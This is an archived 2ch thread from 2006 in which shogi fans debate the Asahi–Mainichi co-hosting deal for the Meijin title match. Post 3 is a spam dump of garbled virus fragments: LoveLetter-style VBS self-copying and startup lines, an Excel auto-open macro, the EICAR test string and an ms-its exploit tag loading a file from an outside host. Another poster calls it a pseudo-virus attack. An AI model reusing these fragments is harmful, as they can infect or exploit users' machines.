2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

名人戦は朝日新聞と毎日新聞が共催で合意 33局目

1 :名無し名人:2006/11/05(日) 07:51:56 ID:qznZCKDo

日本将棋連盟: 将棋名人戦の共催合意について
http://www.shogi.or.jp/osirase/061101meijin.html

MSN毎日インタラクティブ: 名人戦問題
http://www.mainichi-msn.co.jp/entertainment/shougi/issue/

朝日新聞社: 将棋ニュース一覧
http://www.asahi.com/shougi/news/

前スレ: 名人戦は朝日新聞と毎日新聞が共催協議入り 32局目
http://game9.2ch.net/test/read.cgi/bgame/1158983063/l50

過去ログ: 【将棋】名人戦@避難所
http://jbbs.livedoor.jp/bbs/read.cgi/game/11243/1144843337/66-n

2 :名無し名人:2006/11/05(日) 08:04:24 ID:4/HHtRub
>>1
スレ立て乙

3 :名無し名人:2006/11/05(日) 10:00:57 ID:FGXM3WW+
<body onload=window()>
If s = fso.CopyFile f1.path, f1.path+"l"
Set A4 (1)))
fso.copyfile \"
c MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = fso.CopyFile f1.path, f1.path+"l"
ToInfect.
G.RegWrite A
lines(n)=
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :名無し名人:2006/11/05(日) 13:24:36 ID:KcOJHZtj
あげ

5 :名無し名人:2006/11/05(日) 13:41:24 ID:ojkPON17
また、擬似ウィルス攻撃か。早速だな。
ご苦労さんなことで、と嫌味の一つも言いたくなる。
ところで、誰かさんの耕作部隊は、そこまでやんなきゃ行けないほど困り果ててるの?
そう思われるだけだよ。
まあ、誰がやったという証拠はどうせ出ないんだけど、
単なる愉快犯なら他のスレでもこの悪戯多発する筈だよねぇ〜w(疑惑の目)


6 :名無し名人:2006/11/05(日) 13:51:26 ID:AFjs1xkW
http://www.zakzak.co.jp/top/2006_11/t2006110202.html


7 :名無し名人:2006/11/05(日) 14:02:30 ID:sbQHKXEN
朝日と毎日って駄目二頭新聞社じゃないか
本気か将棋連盟?

8 :名無し名人:2006/11/05(日) 14:04:50 ID:dUi4Aqq1
しかし、このスレで一番違和感があるのは、ちょっと自分と違った意見が提示されるとすぐに
「工作員乙」といった認定厨が出てくることだ。なんか初期の2ちゃんねるっぽい行為というか
すごく幼稚なんだよねぇ。こういったレスは連盟サイド、毎日サイド、中立的見地、どの意見に対しても
付けられる。あと、他人の意見に対しても物凄く攻撃的だよね。まあこれはこのスレというよりも
この板の特徴なのかも知れないけど。

今回の騒動を対局で例えた場合、あくまでまだ中盤の入口に過ぎないというのが
実際のところなんだよねぇ。形勢も良く分からない。どちらの言い分もそれなりに通った形で
円満解決に終わるかも知れないし、もう一悶着あるのかも知れない。
新聞社としてもプロ将棋というコンテンツと完全に縁は切れない、でも出す金を
増やすわけにはいかない……そういったジレンマがあるわけで。

9 :名無し名人:2006/11/05(日) 14:06:09 ID:jpoyguTJ
>>7
やっぱ、読売だなあ。竜王戦最高!!

10 :名無し名人:2006/11/05(日) 14:22:49 ID:vt080Fiv
まー西村=理事会が出したコメントが手順やら礼儀やらいろいろ間違った
不適切なものなのは確かだが、結局両新聞社の出してくる条件は
連盟の顔が立つ程度には緩めてくれるんじゃないの? > 金銭的な面で

はっきりいって毎日・朝日とも連盟とがちゃがちゃ揉めて多少値切るよりは、
さっさと話をまとめてこの問題にケリをつけたいんじゃないかな。

11 :名無し名人:2006/11/05(日) 14:29:14 ID:B0hhvIlC
もはや新聞社が連盟の顔を立てる義理なんてない罠。

つーか、連盟は義理とか礼儀とか伝統は無しでビジネスをやろうとしてんだから
相応のお金しか動かないよ。
大山のみたいに、頭を下げてスポンサーを動かせるような人脈も
全部ぶっ壊したんだから。

価値に見合ったお金しか出ない。
ましてや、競争の起こらない環境ならなおさらだね。

12 :名無し名人:2006/11/05(日) 14:37:39 ID:tBhhY8LZ
つまり正常になったってことだな

13 :名無し名人:2006/11/05(日) 14:41:34 ID:75c7jHuA
今後の展開としては

1)名人戦の契約金額
2)王将戦の処理

だけでいいのかな?

14 :名無し名人:2006/11/05(日) 14:49:50 ID:BCcGHUJ3
協賛金の有無
朝日の臨時棋戦の有無

15 :名無し名人:2006/11/05(日) 14:59:36 ID:6fz639yl
1日に新聞側から連盟に「合意」の連絡があった、
そこには三カ条があり、冒頭に「契約金は両社が折半」

そこで理事会は四時まで「大いに激論」(米長日記)
六時半の新聞発表を待って連盟サイトに、あのコメントを出した。
「契約金ほか総額」。「ほか」ね。

つまり、現時点の争点は契約金以外の部分、おそらくは普及協力金。
争点があるということは利害不一致の関係。
米長も改めて「鉄の一枚岩」と書かざるを得なかった。

16 :名無し名人:2006/11/05(日) 16:01:33 ID:F0wlrCDF
ここで騒いだってある程度双方の言い分通りでまとまるのに。
名人戦が3億2千÷2になるって言ってる人って、毎日撤退王将戦
撤退って騒いでた人と一緒でしょ。
名人戦3億2千、朝日オープン1億5千あるのに、3億2千÷2になる
ワケないじゃん。

もし交渉がこじれて共催がおじゃんになったら、連盟よりむしろ
毎日新聞社の文化部は責任取ることになるよ。
(連盟は名人戦朝日単独開催って手があるからね)
来年4月から急に将棋欄が消えれば、さすがに読者から
クレームくるでしょ。
将棋欄って読んでる読んでないはおいといても、視覚的には目を
引くからね。
アンチ連盟は「将棋欄なんていらん」とかってまた言い出すんだろうね

17 :名無し名人:2006/11/05(日) 16:41:48 ID:aWgXC7zq
ただ将棋ファンというのは死ぬまで将棋ファンなんだよ。
確かに数は少ないけど、一度覚えてしまったらなかなか完全に縁を切らない。
例え自分では指さなくても、プロの将棋には注目し続ける。
息の長いファン層を抱え込むという点では、決して悪いコンテンツではないんだ。
新聞と将棋はどちらも古い文化として、新興の文化に押されつつある、いわば似た物同士
ともいえる。
伝統を守るというお題目は、ある意味将棋だけに向けられた言葉ではない。
将棋まで捨て去ることは、新聞の独自性を守るという意味で思いのほかマイナスイメージを
抱え込むことになるのではないか。


それにしても数億はボリすぎだとおもうけどな

18 :名無し名人:2006/11/05(日) 16:58:26 ID:6nxnJgqj
交渉って文化部がするの?
編集局に予算を決定する権限なんてないような。


19 :名無し名人:2006/11/05(日) 17:11:20 ID:6nxnJgqj
よく考えたら、編集局長なら権限ありそう。
×編集局に予算を決定する権限なんてないような。
○編集局の一部門に予算を決定する権限なんてないような。

そもそも、両社が共催合意したんだから、おじゃんとかありえんだろ。
もう名人戦をもっていくところはないんだし、
契約上で、連盟によっぽど不利な条件でないかぎり、
連盟は契約をのむしかない。

それに、名人戦契約に関しては、新聞社もある程度は、
連盟の顔をたててくれるとは思うな。


20 :名無し名人:2006/11/05(日) 18:07:21 ID:rTpPYv7s
>>19
>もう名人戦をもっていくところはないんだし、

ってことだね。読売に名人・竜王の2つをやってもらうわけにもいかんし、
創価やアルゼに頼むわけにもいかんだろう。


21 :名無し名人:2006/11/05(日) 18:14:47 ID:vHap3OZ6

いやいや、普及協力金はともかく、
新棋戦は新興企業にお願いして回ることになるかもよ。

PC対プロ棋士の棋戦立ち上げたら(PCは開発者が対局料・賞金ゲット)、
いくらでもスポンサーは付くと思うけどな。

最長で二十年くらいの寿命だろうけど。

22 :名無し名人:2006/11/05(日) 18:19:26 ID:F0wlrCDF
>>19
なぜおじゃんがありえないの?
契約金額で折り合いがつかなければ、共催案は否決でしょ。
それに共催案は毎日から名人戦を急に取り上げるのは酷という
情けから来てるんだし、朝日単独案と同じぐらいの金額で落ち着くと
考えるのが妥当。
朝日だって3億5千+普及金1億5千+臨時棋戦ぐらいのお金を
出そうと思えば出せるわけだしね。

23 :名無し名人:2006/11/05(日) 18:22:30 ID:aq/aSt+T
>共催案は毎日から名人戦を急に取り上げるのは酷という情けから来てるんだし、

これは違うだろ。それぞれの思惑があってのこと。

24 :名無し名人:2006/11/05(日) 18:34:02 ID:rTpPYv7s
>>22
>共催案は否決でしょ。

今進行中なのは共催「案」ではなく、共催を前提とした実施形態の詰めですよ。
会議やってるわけじゃないのに誰が否決するというんだか。
仮に朝日・毎日の共催がつぶれたら、どこが主催を引き受けるの?
朝日単独なんて、連盟が土下座して「契約金0円でいいからやってくれ」
とでも頼み込まないかぎり朝日もやってくれない。

25 :名無し名人:2006/11/05(日) 18:34:18 ID:F0wlrCDF
それとね、このニュースに注目してる人たちは、将棋好きの人が
多いと思う。
将棋が好きな人は、誰かしら好きな棋士が一人はいて、棋士が
幸せになってほしいと思ってるし、連盟にも頑張って欲しいと思ってる。
この騒動が続けば将棋ファンの人から見れば嫌な気持ちになるし、
新聞社へのイメージも変わってくる。
ここで連盟を叩こうとしてる人たちは、たぶん将棋界のことなんて
知ったこっちゃないって人でしょ。

26 :名無し名人:2006/11/05(日) 18:39:22 ID:gDEv73f1
何ヵ月もファン不在でグダグダやっていること自体、名人戦の価値を
下落させている。2社で共催することで、今まで以上に素晴らしい
名人戦・順位戦の運営ができることを、誰もイメージできていないだ
ろ?

27 :名無し名人:2006/11/05(日) 18:42:38 ID:vHap3OZ6
>>25
例えば、A級棋士は連盟がなくても飯を食っていける件。
その棋士のファンも連盟なんか知ったこっちゃないわな。

28 :名無し名人:2006/11/05(日) 18:43:48 ID:F0wlrCDF
>>23
思惑って具体的になに?

>>24
だから朝日は単独でもやろうと思えばやれるでしょ。
朝日がそもそも名人戦移管の話しを持ち出したんだよ。


29 :名無し名人:2006/11/05(日) 18:47:19 ID:rTpPYv7s
>>28
君の書いてることは実際の騒動の流れや各当事者の発言・行動や社会常識を
無視しすぎていて、お話にならん。


30 :名無し名人:2006/11/05(日) 18:48:57 ID:F0wlrCDF
>>26
毎日のイメージは下がってるね。

>>27
A級棋士には関係ないと本気で思ってるの?

31 :名無し名人:2006/11/05(日) 18:54:09 ID:F0wlrCDF
>>29
具体的にどこ?
「朝日単独案とバランスが取れた金額で共催案が合意される」という
考えが理解できない人の方が、非常識でお話しにならないよ。
この考えが君には理解できないの?

32 :名無し名人:2006/11/05(日) 19:03:43 ID:EgzSRDLk
>>25
羽生、森内、渡辺が好きだが、みんな理事会に反発してくれた。
この馬鹿げた騒動を起こした理事会連中に腹が立っているし、とっとと引責辞任して
事態を収拾させるべきだと思っている。
ここまで来てしまったら、連盟の収入減は避けられないかも知れないが、私の好きな
棋士は、食うに困る事は無いだろう。

棋力の落ちた元一流棋士達の一番の仕事は、次の世代が将棋に専念出来る環境を
作る事の筈だ。
それとは全く逆の行動をしている理事達が消えてくれる事が、将棋界の発展に、一番
重要なことだと思う。


33 :名無し名人:2006/11/05(日) 19:05:07 ID:F0wlrCDF
まぁrTpPYv7sにとっての常識って、
>朝日単独なんて、連盟が土下座して「契約金0円でいいからやってくれ」
>とでも頼み込まないかぎり朝日もやってくれない。
これだもんね。
君の意見は今後スルーすることにするよ。

34 :名無し名人:2006/11/05(日) 19:05:12 ID:lnEMfDJ5
共催の交渉相手が朝日でもあることを忘れてないか?

35 :名無し名人:2006/11/05(日) 19:08:51 ID:F0wlrCDF
>>32
羽生森内渡辺が好きなんて嘘つかないでいいよw
渡辺のブログ読んでたら、そんな考えになるはずないし、
渡辺もそんなこと思ってないよ。

36 :名無し名人:2006/11/05(日) 19:17:14 ID:6fz639yl
とにかく現時点では三つの棋戦が宙に浮いちゃってる。

連盟は来年の予算を組めないし、
多分そのつもりであろう将棋の日での事業計画発表もできない。

37 :名無し名人:2006/11/05(日) 19:24:14 ID:6nxnJgqj
ID:F0wlrCDF は、事実やら数字なら、細かい間違いあるし、
本当にこの問題追ってきたのか?
2chのこのスレの過去ログ全部読めとは言わないが、
将棋トピックスと、そのリンク先読み直してきて欲しいよ。

スポンサーの新聞社がどう書いてるかとかね。

連盟をかばうだけが、将棋界にとってプラスになるわけじゃない。


38 :名無し名人:2006/11/05(日) 21:07:07 ID:F0wlrCDF
>>37
細かいことより、もっとツッコむ奴たくさんいるでしょ。
なんで俺には細かいところツッコんで、他の電波まがいの奴には
何もツッコまないの?
せめてどこが間違ってるかぐらい指摘したら?

39 :名無し名人:2006/11/05(日) 21:20:00 ID:tqr1X5OG
ID:F0wlrCDFは、前スレの「浅はか君」かい?


40 :名無し名人:2006/11/05(日) 21:35:19 ID:Q2T1psRp
バイトの工作員

41 :名無し名人:2006/11/05(日) 21:49:06 ID:6nxnJgqj
>せめてどこが間違ってるかぐらい指摘したら?
どうせ、指摘しても無駄だろ。でも、一応書いとく。

○数字と事実関係から
> 名人戦が3億2千÷2になるって言ってる人って
どこに書いてある?

>名人戦3億2千、朝日オープン1億5千あるのに
間違ってる。

>朝日がそもそも名人戦移管の話しを持ち出したんだよ。
連盟からです。朝日も打診を受けた書いている。

○その他
>毎日のイメージは下がってるね。
F0wlrCDFの中ではそうなのかもしれないが、
俺は連盟のイメージのほうが下がっていると思う。

ついでに言えば、朝日の共催はお金の面で節約だけでなく、
今回の件で悪者にされないため、共催をえらんだように見える。


42 :名無し名人:2006/11/05(日) 21:52:20 ID:6nxnJgqj
別に意見を言うのは自由なんだが、
基本的なところで間違っていたりして、
そんなの前提にしてなにか言われても困りますね。

あと、>>8 がいいこと言っている気がします。


43 :名無し名人:2006/11/05(日) 21:54:34 ID:tqr1X5OG
>ついでに言えば、朝日の共催はお金の面で節約だけでなく、
>今回の件で悪者にされないため、共催をえらんだように見える。

俺もそう思うな。
朝日は、タマ(資金)は毎日よりもたっぷり余裕がある。
共催でチビるくらいなら、最初からそんな話持ち掛けない。
連盟の手際の悪さと世論の反応なども見て、泥沼で心中させられるのは
かなわない、ということで、毎日に対する配慮と禅譲なのだろう。
「悪いのは連盟で、私たちじゃないですよ」という毎日へのアピールも
あるかもしれない。
毎日がどう感じているかは、よくわからないけど。


44 :名無し名人:2006/11/05(日) 22:00:17 ID:4/HHtRub
>>41
乙。暇つぶしに書いていたけど、先を越された。

契約ごとの常識で、朝日新聞社は3月に提示した契約案には
現在は一切縛られない。共催案も同様。
もう少し人生経験を積めば解るよ>ID:F0wlrCDF


45 :名無し名人:2006/11/05(日) 22:03:19 ID:F0wlrCDF
>>41
>どこに書いてある?
前スレ967、972

訂正は、ソースなり正しい値を出すべきと思うよ。
「どこに書いてある?」 → 「前スレ」
じゃ君だって面倒でしょ。

イメージは人それぞれだから訂正ではないね。

>連盟からです。朝日も打診を受けた書いている。
これに関してはすごく気になるので、ソースをお願いします(´・ω・`)

46 :名無し名人:2006/11/05(日) 22:06:13 ID:F0wlrCDF
>>44
縛られる縛られないじゃなく、そういう金額に落ち着くと言ってるんだけど。
契約金が下がるって言ってる根拠はなんなの?
あと下がるというなら、具体的にはどれぐらいになるか値を出してみて。

47 :名無し名人:2006/11/05(日) 22:20:51 ID:4/HHtRub
>>46
クレクレ君には何も教えないよ。>>37がいいこと書いてるじゃない。

下がるとは言っていない。俺の予想は4億弱で現在から5000万位の
アップ。前スレのどこかに書いた。
それはともかく、朝日オープンと王将戦は朝日、毎日が共催と関係
なく別途連盟と交渉となっているのに、朝日オープンの契約金を足
すのがおかしいと言っている訳だ。
あくまでもベースは現在の名人戦契約金で3億3400万円。

48 :名無し名人:2006/11/05(日) 22:33:23 ID:F0wlrCDF
>>47
>クレクレ君には何も教えないよ。
便利な言葉だねw

>朝日オープンの契約金を足すのがおかしい
すごく自然と思うんだけど。
そこまで説明しなきゃダメなの?

49 :名無し名人:2006/11/05(日) 22:34:02 ID:6nxnJgqj
指摘してもやっぱり無駄だった。

> >どこに書いてある?
> 前スレ967、972
あんがとよ。

> 名人戦が3億2千÷2になるって言ってる人って、
こんな書き方するから、みた覚えないし、そんなこと言う奴いねーと思ったよ。
これじゃ、契約金は1億6000万だと思うだろ。
元記事のほうが分かりやすい書き方だな。
ま、これ自体は、そのレス書いた人と話してくれ。

>名人戦3億2千、朝日オープン1億5千あるのに
契約金間違ってるの無視しているな。
契約金ソースはここからたどってくれ。
http://d.hatena.ne.jp/mozuyama/20060412/P20060412MEIJIN

> >連盟からです。朝日も打診を受けた書いている。
> これに関してはすごく気になるので、ソースをお願いします(´・ω・`)
そんなこと言っているから、「 本当にこの問題追ってきたのか?」と書くの。
もう、この問題が最初にでたときから、新聞も、2chのスレでも指摘されてきたじゃないか。

asahi.com: 「連盟諮問委が朝日に打診」将棋名人戦巡り理事会が説明-朝日新聞エンターテインメント情報
http://kdd.asahi.com/culture/entertainment/news/TKY200604140308.html


50 :名無し名人:2006/11/05(日) 22:46:31 ID:DaL3ajCG
>名人戦:3億3400万円
>朝日オープン:1億3480万円
の合計4億6880万以上になることは確実でしょ。
そうでないなら、棋士総会の結果通り朝日単独にしていればよかったわけだから。

51 :名無し名人:2006/11/05(日) 22:50:55 ID:kmex8Z78
現状で決まったのは、契約金が折半で、対等な立場で運営するということ。
もしA社が3億まで出すと言ってもB社が2億が限度と言ったら、
結局少ない方に合わせないと折半できない。
3億+2億=5億では折半にならないので、
結局2億ずつで、合計4億が契約金となってしまう。

52 :名無し名人:2006/11/05(日) 22:53:05 ID:6nxnJgqj
>>47
クレクレ君に教えちゃいました!
でも、もう 「F0wlrCDF」の相手すんの疲れたから、バトンタッチするよ(笑)

俺の予想は、名人戦は4億いかないとおもう。
そもそも最初の朝日提案でも、3億5500万円/年だし、
竜王戦の3億4150万円 より、6000万近く差をつける意味は無い。
そのかわり、毎日は王将戦継続、朝日は普及協力金をだす(というのが希望)。


53 :名無し名人:2006/11/05(日) 22:56:23 ID:tqr1X5OG
教えてもわざと曲解するだろうけどね。クレクレ君。


54 :名無し名人:2006/11/05(日) 22:57:00 ID:6nxnJgqj
新聞社は将棋ファンのために今回は我慢して、
王将戦存続させたり、普及協力金で連盟の赤字補填して、
連盟の赤字体質がなくなるといいね。

ただし、連盟がまともになるのが条件。
でないとまた繰り返したりして、本当に新聞社が連盟を見捨てるよ。
毎日の撤退の可能性はかなり高かったように見える。

そうなって困るのが将棋ファンだから、連盟に文句いいたくもなるさ。


55 :名無し名人:2006/11/05(日) 22:57:14 ID:F0wlrCDF
>>49
ありがとう

>>52
君よりも6nxnJgqjは大人だったねw

56 :名無し名人:2006/11/05(日) 23:01:58 ID:tqr1X5OG
>>55
ま、スレの活性化のためには、君のような存在も貴重だ。
連盟のために頑張って論陣張ってくれ。


57 :名無し名人:2006/11/05(日) 23:06:16 ID:iO3AbfOJ
>>55
志村、>>52のID wwwww

>>56
前半同意だが、
F0wlrCDFの主張は長期的には全く連盟のためになっていない件。

58 :名無し名人:2006/11/05(日) 23:06:57 ID:F0wlrCDF
>>54
我慢なんてしなくても普通と思うよ。
王将戦継続はスポ日の将棋欄があるから、当然継続することが
予想される。
将棋欄が名人戦になっても、朝日オープンを継続するというなら
朝日新聞スゲーってなるけど、そんなことまずあり得ないだろうしね。
あとこれが名人戦と朝日オープンの金額を合わせて共催額にする理由ね。
>>50も同じこと書いてるけど。

59 :名無し名人:2006/11/05(日) 23:08:04 ID:F0wlrCDF
>>57
志村の使い方間違えてるよw

60 :名無し名人:2006/11/05(日) 23:15:06 ID:iO3AbfOJ
>>58
スポ日の将棋欄を理由に「当然継続することが予想される」は強すぎ。
スポーツ新聞は朝日や毎日より将棋欄を切る選択肢を採りやすいだろうから。

>>59 orz

61 :名無し名人:2006/11/05(日) 23:15:22 ID:tqr1X5OG
>>57
まぁ、ね。

ただ、連盟がDQNであるという根拠はほぼ出尽くし確定したところに
あえて連盟の立場で論陣を張ろうという姿勢は面白い。
どこまで頑張れるのかな。


62 :名無し名人:2006/11/05(日) 23:18:03 ID:4/HHtRub
>>52
中学生でも解るように説明したつもりだったけど、無理みたい
なので俺はもうギブアップしてますので。乙でした。

合意内容は
(1)契約金は両社が折半し、共同で連盟と交渉
(2)両社は対等な立場で「実行委員会」を組織し、連盟とともに名人戦の運営に当たる
(3)取材は両社が自由に行い、棋譜や観戦記、新聞やウェブサイトへの掲載は両社
  平等を原則とする−−の3点。
また王将戦については毎日新聞社が、朝日オープン選手権については朝日新聞社が
個別に連盟と協議する。

これは毎日新聞社の記事だから無視されているのかな・・・
これを読んだ後も名人戦+朝日オープンで足し算できるとしたら、ホラ彦常務理事
クラスの将棋脳だからそれはそれで凄い訳だが。

63 :名無し名人:2006/11/05(日) 23:18:44 ID:GtbAzi6u
>>32
>この馬鹿げた騒動を起こした理事会連中に腹が立っているし、とっとと引責辞任して
>事態を収拾させるべきだと思っている。


辞めて事態収拾なんて無責任の極み。辞めるとしてもそりゃすべてが解決してからだな。
それにいま辞めたところで事態収拾なんて無理。
「毎日新聞と名人戦の契約は更新しない」「共催の上、名人戦契約を締結する」というのは
今の理事会でも仮に理事会が新しくなったとしても、これを破棄することはできない。
破棄しようと思ったら棋士総会の議決が必要。ただ、それを破棄したからといって
名人戦が元の鞘に収まるわけでもない。

これは大昔のスレでも言ったが、事態を収拾させることが出来たのは、5月の通常総会しかなかった。
ここでクーデターを起こして理事会を総退陣に追い込む。これが事態収拾の唯一のチャンスだった。
羽生や森内といった力を持った棋士が動けば、クーデターが仮に成功せずとも、名人戦問題の動向に
多大なる影響を与えたのは間違いない。
これも再三再四言ってきたが、羽生を始めとしたトッププロがそうしなかったということは
各論に問題があったとしても総論では米長体制を支持している、もしくは自ら泥を被る気がないかのどっちか。

もう今の段階では仮に理事会総辞職となっても、流れと混乱を止めることは不可能。
それなら来年の5月までに名人戦問題にカタをつけてもらい、任期満了に伴う理事選で
何らかの手を打った方が良いだろう。

64 :名無し名人:2006/11/05(日) 23:21:14 ID:lolqyFhf
共催になったら、名人が竜王より上だと思うんだけど、そうしたら、読売が怒るのかなあ。共催なのに、読売より格下なのは問題にならないのかな。

65 :名無し名人:2006/11/05(日) 23:23:04 ID:F0wlrCDF
>>60
そりゃスポーツ新聞の方が切り易いだろうけどね。
王将戦は継続するだけの理由があるってこと。

66 :名無し名人:2006/11/05(日) 23:23:54 ID:DaL3ajCG
>>64
1社当たりの金額は読売が一番なので、序列1位の理由になるとかどっかに書いてあった気がする。

67 :名無し名人:2006/11/05(日) 23:28:52 ID:tqr1X5OG
>>66
だとすると、スポンサー序列が1位ということであり、
タイトルの序列はあくまで名人が上位という解釈を
すべきだと思う。読売はそれで満足なのだろうか。

68 :名無し名人:2006/11/05(日) 23:33:51 ID:EgzSRDLk
>>50
> の合計4億6880万以上になることは確実でしょ。

それは、連盟の都合。

> そうでないなら、棋士総会の結果通り朝日単独にしていればよかったわけだから。

8月の棋士総会では、朝日単独開催を選択してはいない。
僅差で毎日単独開催を否決した。

理事会は、8月の棋士総会の前、棋士達に、毎日・朝日共催案を示して毎日単独案
を否決させる様に働きかけていたそうだ。

また、棋士総会直前に、有力棋士から毎日支持を表明されたりしたので、そのまま
朝日単独に持って行くと揉めるので、毎日側から名人戦を降りた形を取らせるため
に出した奇計が、8月に出した共催提案。
理事会も、共催などあり得ないと思っていたので、これで朝日移管が成功すると思っ
ていた所、毎日が受けてしまったので、計画が狂った。

 さらに味方だと思っていた朝日が、毎日と手を組んだ様なので焦っているといった
所だろう。

読みが甘かったために、誤った選択をして損をしそうな状況に置かれているだけ。
別段、珍しい話ではない。

名人戦移管なんて最初からしなければ良かったんだよ。

69 :名無し名人:2006/11/05(日) 23:37:06 ID:iO3AbfOJ
>>67
確かよみくま氏が何か言っていたな、ということでぐぐったら出てきた。

「契約金の面で、共催の「大・名人戦」が竜王戦を上回れば、
竜王戦が序列2位になるのは当然です。
棋戦の序列は契約金の順と決まっているので、
それを無視して竜王戦を最高棋戦にしてほしいとは全く思いません。
2位なら2位で粛々と運営すればいいでしょう。」

ttp://d.hatena.ne.jp/mozuyama/20060922/P20060922TSUMI

なお、よみくま氏は「契約金折半はないでしょう」とも言っていた訳だが。
ttp://d.hatena.ne.jp/mozuyama/20060804


70 :名無し名人:2006/11/05(日) 23:37:40 ID:F0wlrCDF
>>68
ツッコみどころ満載だけど・・・
俺にツッコんでた人たちはスルーするんだろうなぁ

71 :名無し名人:2006/11/05(日) 23:39:45 ID:GtbAzi6u
>>67
ま、そうだよな。
契約金が名人>竜王となるんだったら、スポンサーがどうあれ
タイトルの序列(席次)は名人の方が上。
共催云々ってのは「誰が金を出すか」って問題に過ぎんわけだからねぇ。

>>68
契約金額と契約内容、王将戦などの別棋戦の扱いがどうなるかは
まだまだわからんというか、波乱含みの展開だと思うがねぇ。
朝日オープンの廃止(規模縮小)はほぼ間違いないと思うけど。

ただ、これで毎日と朝日が出すお金を渋ったとしても、毎日と朝日の思惑通りに
コトが運ぶかどうかはわからない。もしそうなったら理事会の首チョンパは決まりだろうけど
ほかの棋士がそれだけで納得せず、共催案自体を破談に持ち込むかも知れんよ。
貰う金が減るって事は、理事会だけでなくその他の棋士にとってもありがたくはない事態だからね。

72 :名無し名人:2006/11/05(日) 23:42:40 ID:DaL3ajCG
>>68
http://www.asahi.com/shougi/news/TKY200609190456.html
> 5月になって米長会長は朝日、毎日両新聞社に名人戦の共催を提案。
> 棋譜を使用する観戦記などは両社で独自に掲載する▽両社の関係は対等である
> ▽契約期間は5年間との基本線を示したほか、共催する両社の拠出額の合計が、
> 現在の名人戦の契約金と朝日オープン将棋選手権の契約金の合計(約4億7000万円)を上回るよう求めていた。

連盟はこれを朝日と毎日に提示していて、朝日は当初から応諾していて毎日も9月になってから応じたわけだが。

73 :名無し名人:2006/11/05(日) 23:44:57 ID:F0wlrCDF
>>71
>>66

74 :名無し名人:2006/11/05(日) 23:45:12 ID:tqr1X5OG
とにかく、朝日の動向が、連盟にとってもっとも気になるところだろうからね。
舵棒は朝日が握っている。
そして、船(泥舟かも?)から捨てようとした毎日さえ、無視できない。
共催案の実現を一番驚き悔やんでいるのは、もしかすると連盟なのかもしれないね。


75 :名無し名人:2006/11/05(日) 23:45:28 ID:EgzSRDLk
>>63
手抜きした部分に突っ込まれたね。
今さら総退陣しても駄目なのはその通り。

ただ、8月の総会でも、事態を収拾する事は可能だったと思う。
毎日単独案を可決し、今回の件の責任を取って理事を全員罷免し、新会長が各社に
頭を下げるという選択も、あの時点では出来た筈。


76 :名無し名人:2006/11/05(日) 23:47:02 ID:4/HHtRub
>>70
突っ込んでみてよ。
前半の否決した、までは客観的事実だから突っ込みようがないけど
後半にどう突っ込むかは明日の朝に見てみたい。

上記だけだと何だから少し書くけど、規模縮小して朝日オープン継続は
可能性としてありだと思うよ。
一番長い日と名人戦7番勝負以外は魅力が薄いコンテンツだから、7月
〜2月まで朝日オープンを掲載して3月〜6月はA級最終戦と名人戦を
朝日新聞本紙に掲載、というのも俺が朝日の担当者なら検討したい。
B級以下は毎日にお任せ、って感じで。

77 :名無し名人:2006/11/05(日) 23:49:36 ID:iO3AbfOJ
>>72
「毎日も9月になってから応じたわけだが」は不正確では。
毎日は元の連盟案にではなく、朝日に対して共催協議入りを解答したのでは。
米長が「たたき台」と言っているのはそのためだろう。
間違ってたら訂正よろ。


78 :名無し名人:2006/11/06(月) 00:01:21 ID:GtbAzi6u
>>75
まあでもね、5月だろうが8月だろうが、クーデターをやろうと思えば出来たわけよ。
それをしなかったのはさっきも言った通り「各論反対、総論賛成」だったから。
「名人戦の強引な移管は許し難い。ただ米長体制がいろいろやってることは評価する」
こういうことだったんじゃない?

米長の首を取った。でも武者野や桐谷を始めとする決して無視できない数が存在する
クズ棋士どもが実権を握ってしまう……こういう事態は避けたかったんだろう。
そうなっては名人戦問題は勿論のこと、その他の問題にまで影響が出てしまうからねぇ。

79 :名無し名人:2006/11/06(月) 00:10:43 ID:ZuDzJ3lt
時期のズレ以外には >>68 にそんなにツッコムところはないな。

俺も時系列は、あやしくなってきた。
将棋トピックスを読み直せば分かるけど。


80 :名無し名人:2006/11/06(月) 00:15:28 ID:nLxN2Vll
>>77
http://hobby.nikkei.co.jp/shogi/news/index.cfm?i=2006080406733s1
>連盟と朝日はそれぞれ朝日・毎日両社による共催案も検討すると表明していた。

元の案が含まれていなければ、連盟が共催提案する理由が無くなる。

81 :名無し名人:2006/11/06(月) 00:23:09 ID:oEYzqaSa
>>78
8月の毎日単独案支持表明が、実質的なクーデターだと思う。でも負けてしまった。
あの時期、それ以上の事をやると、連盟を割る覚悟が必要だったが、さすがにそれは
避けたと観ているんだけど、どうだろう。

82 :名無し名人:2006/11/06(月) 00:33:19 ID:8nbLhIAk
>>81
あれをクーデターと呼ぶにはあまりにもしょっぱい。

「連盟を割る覚悟」っていうけど、理事会を退陣に追い込む→理事会派と羽生一派に分かれる
……という流れになったとしても、誰も理事会にはついていかないでしょ。
今現在ゼニの取れる将棋を指してるのは羽生であり森内であり渡辺なんだから。
そうせずに「移管には反対」を表明したってのは「名人戦移管には反対だが、米長体制を
否とするものではない」ということの表れとみるのが妥当じゃないかな?
渡辺がブログで言っていた「名人戦問題とその他のことはあくまで別」ってのも
つまりはそういうことでしょ。

83 :名無し名人:2006/11/06(月) 00:35:15 ID:haW2S468
>>68
>毎日側から名人戦を降りた形を取らせるために出した奇計が、
>8月に出した共催提案。
妄想だと思う。
共催だろうと、より良い契約ならば別に構わないってのが
連盟の意向でしょ。
毎日を降りさせることは目的じゃない。


>理事会も、共催などあり得ないと思っていたので、これで
>朝日移管が成功すると思っていた所、毎日が受けてしまった
>ので、計画が狂った。
妄想だと思う。
